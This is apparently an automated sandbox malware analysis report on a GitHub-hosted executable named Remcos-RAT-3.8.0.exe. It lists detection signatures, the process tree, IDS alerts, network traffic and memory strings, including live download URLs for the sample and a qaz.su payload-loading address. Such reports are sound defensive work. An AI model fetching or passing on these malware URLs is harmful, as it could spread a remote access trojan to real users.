Windows Analysis Report
https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe

Overview

General Information

Sample URL: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
Analysis ID: 1644538

Detection

Score: 72
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Powershell download and execute
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 8292 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 8340 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • Remcos-RAT-3.8.0.exe (PID: 8472 cmdline: "C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe" MD5: 6166F997B4BB3428AE0D9D4B4E1F0DB2)
    • WerFault.exe (PID: 8632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: Remcos-RAT-3.8.0.exe PID: 8472 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

    System Summary

    Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6136, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1, ProcessId: 8292, ProcessName: cmd.exe
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-20T17:02:28.362047+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49725 | 80.87.203.251 | 443 | TCP

    AV Detection

    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Avira: detection malicious, Label: HEUR/AGEN.1313721
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | ReversingLabs: Detection: 79%
    Source: unknown | HTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.5:49722 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49723 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 80.87.203.251:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: Binary string: System32.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: HPdn0C:\Windows\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1399643990.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Windows.Forms.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: mscorlib.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: \??\C:\Users\user\Desktop\download\System32.pdbri source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.pdb4 source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Core.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System32.pdb& source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: System.ni.pdb source: WER70B5.tmp.dmp.6.dr
    Source: Binary string: C:\Users\Gadr\source\repos\ConsoleApp5\ConsoleApp5\obj\x86\Debug\System32.pdb source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.000000000624D000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000000.1335212870.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400375747.000000000109B000.00000004.00000020.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe.2.dr
    Source: Binary string: System.Core.ni.pdbRSDS source: WER70B5.tmp.dmp.6.dr
    Source: global traffic | HTTP traffic detected: GET /load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06 HTTP/1.1 | Host: qaz.su | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /index.php?a=download&q=file_not_exist HTTP/1.1 | Host: qaz.su
    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 80.87.203.251:443
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Accept: */* | Accept-Encoding: identity | Host: github.com | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko | Accept: */* | Accept-Encoding: identity | Host: raw.githubusercontent.com | Connection: Keep-Alive
    Source: global traffic | DNS traffic detected: DNS query: github.com
    Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global traffic | DNS traffic detected: DNS query: qaz.su
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: ddos-guard | Connection: close | Set-Cookie: __ddg8_=O4wOpy74RXiJCDQ6; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT | Set-Cookie: __ddg10_=1742486547; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT | Set-Cookie: __ddg9_=161.77.13.2; Domain=.qaz.su; Path=/; Expires=Thu, 20-Mar-2025 16:22:27 GMT | Set-Cookie: __ddg1_=hKS2vVwlRirc6uGFQrhA; Domain=.qaz.su; HttpOnly; Path=/; Expires=Fri, 20-Mar-2026 16:02:27 GMT | Date: Thu, 20 Mar 2025 16:02:28 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 4365 | Vary: Accept-Encoding | X-Powered-By: PHP/7.4.27 | Set-Cookie: PHPSESSID=1etumsf5tr0a1ned2fo14bibpt; path=/ | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1401494610.0000000006210000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.coCn
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://qaz.im
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://qaz.is
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://qaz.su
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://qaz.sud
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
    Source: wget.exe, 00000002.00000002.1321859775.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.
    Source: wget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321812511.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr | String found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe
    Source: wget.exe, 00000002.00000002.1321812511.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exeta
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/contact
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/css/font-awesome.css
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/disclaimer
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/favicon.ico
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/index.php?a=admin
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D4F000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/index.php?a=download&q=file_not_exist
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/index.php?a=user
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/js/jquery-1.12.4.min.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/js/jquery.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/js/jquery.tipsy.js
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000000.1335212870.0000000000902000.00000002.00000001.01000000.00000003.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe.2.dr | String found in binary or memory: https://qaz.su/load/rTE6bi/b733f346-f3cc-4059-b212-d58a8e4d2f06
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/privacy
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/style.css?v=2
    Source: Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, Remcos-RAT-3.8.0.exe, 00000003.00000002.1400718528.0000000002D68000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://qaz.su/tos
    Source: cmdline.out.0.dr | String found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exe
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeRxz
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exeT
    Source: wget.exe, 00000002.00000003.1321521516.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1321935695.0000000002B5D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Ox47100/Remcos-RAT-v3.8.0/refs/heads/main/Remcos-RAT-3.8.0.exex
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Code function: 3_2_00F60848
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 2184
    Source: classification engine | Classification label: mal72.evad.win@6/7@3/3
    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8472
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8300:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\83d7cc86-79e3-469f-88f8-cc1d9f894faf
    Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe" > cmdline.out 2>&1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://github.com/Ox47100/Remcos-RAT-v3.8.0/raw/refs/heads/main/Remcos-RAT-3.8.0.exe"
    Source: unknown | Process created: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe "C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe"
    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wget.exe | Section loaded: explorerframe.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: rasapi32.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: rasman.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: rtutils.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: secur32.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\download\Remcos-RAT-3.8.0.exe | Section loaded: mskeyprotect.dll
